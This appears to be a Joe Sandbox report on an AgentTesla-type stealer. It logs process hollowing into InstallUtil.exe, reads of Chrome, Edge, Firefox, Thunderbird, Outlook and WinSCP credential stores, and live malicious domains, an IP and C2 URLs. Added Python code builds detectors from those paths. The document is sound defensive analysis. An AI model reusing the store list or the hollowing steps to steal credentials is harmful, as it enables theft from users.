Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Queries volume information: C:\Users\user\Desktop\tTXQS6DONV.exe VolumeInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
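The entries above record the core of a process-hollowing sequence: tTXQS6DONV.exe starts a fresh InstallUtil.exe, allocates an execute/read/write region in it at 0x400000 (the default image base of a 32-bit .NET executable), writes a buffer that starts with 4D5A (the MZ signature) at that base, writes further blocks at 0x402000, 0x42C000 and 0x42E000, and makes one more write at 0x114D008, well outside the image. The Python below is an added example and not part of the Joe Sandbox report: it folds such API events per (source, target) pair and decides whether they amount to hollowing. The event layout, the region sizes, the thread resume, the benign self-write and the reading of the out-of-image write as a PEB or thread-context patch are assumptions; the bases, the protection and the MZ prefix are the values the report lists.

```python
"""Process-hollowing indicator logic over sandbox-style API events (added example)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SRC = r"C:\Users\user\Desktop\tTXQS6DONV.exe"
DST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"


@dataclass(frozen=True)
class Event:
    op: str                       # process_create | mem_alloc | mem_write | thread_resume
    src: str                      # acting process
    target: str                   # process whose memory or threads are touched
    base: int = 0
    size: int = 0
    protect: str = ""
    prefix: bytes = b""           # first bytes of the written buffer, when the sandbox logs them
    flags: Tuple[str, ...] = ()


# Constructed event stream in the order a hollowing loader issues the calls. Sizes, the
# CREATE_SUSPENDED flag on the create and the final resume are assumptions.
EVENTS: List[Event] = [
    Event("process_create", SRC, DST, flags=("CREATE_SUSPENDED",)),
    Event("mem_alloc", SRC, DST, base=0x400000, size=0x30000, protect="PAGE_EXECUTE_READWRITE"),
    Event("mem_write", SRC, DST, base=0x400000, size=0x400, prefix=b"MZ\x90\x00"),  # PE headers
    Event("mem_write", SRC, DST, base=0x402000, size=0x2A000),                      # sections
    Event("mem_write", SRC, DST, base=0x42C000, size=0x1000),
    Event("mem_write", SRC, DST, base=0x42E000, size=0x1000),
    Event("mem_write", SRC, DST, base=0x114D008, size=4),   # outside the image: PEB/context patch candidate
    Event("thread_resume", SRC, DST),
    # Benign control: a process writing into its own address space is not cross-process injection.
    Event("mem_write", DST, DST, base=0x500000, size=16, prefix=b"MZ"),
]


@dataclass
class State:
    suspended: bool = False
    rwx: List[Tuple[int, int]] = field(default_factory=list)   # foreign RWX regions as [lo, hi)
    mz_base: Optional[int] = None
    out_of_image: List[int] = field(default_factory=list)
    resumed: bool = False

    def in_rwx(self, addr: int) -> bool:
        return any(lo <= addr < hi for lo, hi in self.rwx)


def verdict(st: State) -> dict:
    indicators = []
    if st.suspended:
        indicators.append("target created suspended")
    if st.rwx:
        indicators.append("foreign RWX allocation")
    if st.mz_base is not None:
        indicators.append(f"PE image written at 0x{st.mz_base:X}")
    if st.out_of_image:
        indicators.append("write outside injected image (PEB/thread-context patch candidate)")
    if st.resumed:
        indicators.append("thread resumed after writes")
    # A suspended target plus a PE image landing in a foreign RWX region is the hollowing
    # core; the resume and the out-of-image write are corroborating signals only.
    hollowing = st.suspended and st.mz_base is not None
    return {"hollowing": hollowing, "indicators": indicators, "out_of_image": st.out_of_image}


def analyze(events: List[Event]) -> Dict[Tuple[str, str], dict]:
    """Fold events per (src, target) pair and return a verdict for each pair."""
    states: Dict[Tuple[str, str], State] = defaultdict(State)
    for ev in events:
        if ev.src == ev.target:
            continue                                   # only foreign-process access is of interest
        st = states[(ev.src, ev.target)]
        if ev.op == "process_create" and "CREATE_SUSPENDED" in ev.flags:
            st.suspended = True
        elif ev.op == "mem_alloc" and "EXECUTE" in ev.protect and "WRITE" in ev.protect:
            st.rwx.append((ev.base, ev.base + ev.size))
        elif ev.op == "mem_write":
            if ev.prefix.startswith(b"MZ") and st.in_rwx(ev.base):
                st.mz_base = ev.base                   # a full PE image is being laid into the region
            elif not st.in_rwx(ev.base):
                st.out_of_image.append(ev.base)
        elif ev.op == "thread_resume":
            st.resumed = True
    return {pair: verdict(st) for pair, st in states.items()}


if __name__ == "__main__":
    for (src, dst), v in analyze(EVENTS).items():
        print(f"{src} -> {dst}: hollowing={v['hollowing']}")
        for ind in v["indicators"]:
            print("   -", ind)
```

Keying on the MZ prefix inside a foreign RWX region rather than on any single API keeps the rule quiet for debuggers and instrumentation frameworks, which also write into other processes but do not drop a whole image at the target's base.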

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3bdf172.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b62122.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c09450.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b38642.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b38642.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b62122.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c09450.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3840, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3840, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
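The file and registry opens above are the useful part of this section: in one run, a hollowed InstallUtil.exe reads Chromium Login Data and Cookies (Chrome and Edge), the profiles.ini of three Gecko browsers (Firefox, Cyberfox, BlackHawk), a Firefox cookies.sqlite, Thunderbird and Outlook profile data, IncrediMail identities, WinSCP saved sessions and FTP Navigator's Ftplist.txt. No single access is suspicious; breadth across browser, mail and FTP stores from a process that owns none of them is. The Python below is an added example and not part of the Joe Sandbox report: a small catalogue of credential-store patterns plus a per-process sweep that flags a process once it touches several stores spanning at least two families. The log lines are constructed from the entries above, the chrome.exe control line is invented, and the thresholds are assumptions.

```python
"""Credential-store access sweep detector (added example, constructed input)."""
import re
from typing import Dict, List, Optional, Tuple

# (store id, family, pattern), matched case-insensitively against a file path or registry key.
# The stores are the ones this report shows being opened; the family grouping is an assumption.
STORES: List[Tuple[str, str, str]] = [
    ("chromium_logins",        "browser", r"\\User Data\\[^\\]+\\Login Data$"),
    ("chromium_cookies",       "browser", r"\\User Data\\[^\\]+\\Network\\Cookies$"),
    ("gecko_browser_profiles", "browser",
     r"\\(Mozilla\\Firefox|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$"),
    ("firefox_cookies",        "browser", r"\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$"),
    ("thunderbird_profiles",   "mail",    r"\\Thunderbird\\profiles\.ini$"),
    ("outlook_profile",        "mail",    r"\\Windows Messaging Subsystem\\Profiles\\"),
    ("incredimail_identities", "mail",    r"\\IncrediMail\\Identities$"),
    ("winscp_sessions",        "ftp",     r"\\Martin Prikryl\\WinSCP 2\\Sessions$"),
    ("ftp_navigator",          "ftp",     r"^C:\\FTP Navigator\\Ftplist\.txt$"),
]
COMPILED = [(sid, fam, re.compile(pat, re.IGNORECASE)) for sid, fam, pat in STORES]

# Entry layout assumed: "Source: <process> | File opened: <path>" or "... | Key opened: <key>".
LINE_RE = re.compile(r"^Source:\s*(?P<proc>[^|]+?)\s*\|\s*(?:File|Key) opened:\s*(?P<obj>.+?)\s*$")

INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"   # constructed control process

# Constructed log: the InstallUtil.exe lines mirror the report's entries; the chrome.exe line
# is a browser reading its own password store, which a sweep rule must not flag.
SAMPLE_LOG = rf"""
Source: {INSTALLUTIL} | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: {INSTALLUTIL} | File opened: C:\FTP Navigator\Ftplist.txt
Source: {INSTALLUTIL} | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: {INSTALLUTIL} | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: {INSTALLUTIL} | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: {CHROME} | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""


def classify(obj: str) -> Optional[Tuple[str, str]]:
    """Return (store id, family) for a path or key that is a known credential store, else None."""
    for sid, fam, rx in COMPILED:
        if rx.search(obj):
            return sid, fam
    return None


def sweep(log: str, min_stores: int = 3, min_families: int = 2) -> Dict[str, dict]:
    """Per process: the credential stores it touched and whether the breadth looks like a harvester.

    A stealer does not read one store; it walks a list of them across browsers, mail clients
    and FTP/SFTP tools in one pass, so the thresholds are on breadth, not on any single access.
    """
    touched: Dict[str, Dict[str, str]] = {}
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        hit = classify(m.group("obj"))
        if hit:
            touched.setdefault(m.group("proc"), {})[hit[0]] = hit[1]
    result: Dict[str, dict] = {}
    for proc, stores in touched.items():
        families = sorted(set(stores.values()))
        result[proc] = {
            "stores": sorted(stores),
            "families": families,
            "flag": len(stores) >= min_stores and len(families) >= min_families,
        }
    return result


if __name__ == "__main__":
    for proc, info in sweep(SAMPLE_LOG).items():
        print(proc, info)
```

In a real pipeline the process identity would come from a file-access or registry audit source and the rule would also exempt the legitimate owner of each store (a Chromium browser opening its own Login Data), which the family threshold approximates here.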

Remote Access Functionality

Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3bdf172.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b62122.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c09450.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b8bbf2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b38642.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b38642.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3b62122.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c09450.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 3840, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques flagged for this sample, by tactic; the bracketed figures are the report's signature-count badges)

Reconnaissance: none flagged
Resource Development: none flagged
Initial Access: Valid Accounts [1]
Execution: Windows Management Instrumentation [121]
Persistence: DLL Side-Loading [1]; Valid Accounts [1]
Privilege Escalation: DLL Side-Loading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Process Injection [311]
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [12]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Virtualization/Sandbox Evasion [141]; Process Injection [311]; Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]
Lateral Movement: none flagged
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [11]
Exfiltration: Exfiltration Over Alternative Protocol [1]
Impact: none flagged

Source | Detection | Scanner | Label
tTXQS6DONV.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
tTXQS6DONV.exe | 100% | Avira | TR/Kryptik.wuqqo
tTXQS6DONV.exe | 100% | Joe Sandbox ML |

No Antivirus matches (dropped files)
No Antivirus matches (unpacked PE files)
No Antivirus matches (domains)

Source | Detection | Scanner | Label
http://ftp.aminhacorretora.com.br | 100% | Avira URL Cloud | malware
http://aminhacorretora.com.br | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
aminhacorretora.com.br | 162.241.203.30 | true | true | | unknown
ftp.aminhacorretora.com.br | unknown | unknown | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://aminhacorretora.com.br | InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ftp.aminhacorretora.com.br | InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmp | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
162.241.203.30 | aminhacorretora.com.br | United States | 26337 | OIS1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569277
Start date and time: 2024-12-05 17:13:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: tTXQS6DONV.exe (renamed because the original name is a hash value)
Original Sample Name: 5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 148
• Number of non-executed functions: 53
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: tTXQS6DONV.exe

Time | Type | Description
11:14:05 | API Interceptor | 207x Sleep call for process: tTXQS6DONV.exe modified
11:15:14 | API Interceptor | 462x Sleep call for process: InstallUtil.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.241.203.30 | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | nossoplayer.me/admin/
162.241.203.30 | RjGM2z2Z3gVHbRl.exe | malicious | FormBook | www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
162.241.203.30 | PI5102295.exe | malicious | FormBook | www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
162.241.203.30 | SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exe | malicious | FormBook | www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
162.241.203.30 | ZsFMADRfZB.exe | malicious | FormBook | www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
162.241.203.30 | SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exe | malicious | FormBook | www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
162.241.203.30 | SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exe | malicious | FormBook | www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
162.241.203.30 | SKMB610952.js | malicious | FormBook | www.enriquepimentel.site/k056/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
aminhacorretora.com.br | Hangarskibenes.exe | malicious | GuLoader | 162.241.203.30

Match | Associated Sample Name / URL | Detection | Threat Name | Context
OIS1US | dY1ZxYJOz7.exe | malicious | AgentTesla, DarkTortilla | 162.241.203.30
OIS1US | i9QKJCpVZJ.exe | malicious | AgentTesla, DarkTortilla | 162.241.203.30
OIS1US | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | 192.185.147.100
OIS1US | Documents.exe | malicious | FormBook, PureLog Stealer | 192.185.147.100
OIS1US | https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627 | malicious | HTMLPhisher | 162.241.71.126
OIS1US | http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrm | malicious | Unknown | 162.241.71.126
OIS1US | https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com | malicious | Unknown | 162.241.71.126
OIS1US | Isabella County Emergency Management-protected.pdf | malicious | HTMLPhisher | 162.241.71.126
OIS1US | Isabella County Emergency Management-protected.pdf | malicious | Unknown | 162.241.71.126
OIS1US | https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20though | malicious | Unknown | 162.241.85.172
                              No context
                              No context
Process: C:\Users\user\Desktop\tTXQS6DONV.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
MD5: 8275047EA04782E18195CE5F2F076225
SHA1: 86FE553781E50EE2493A6D54A2F329FF94AD0DEE
SHA-256: 302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
SHA-512: 4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8508558324143882
Encrypted: false
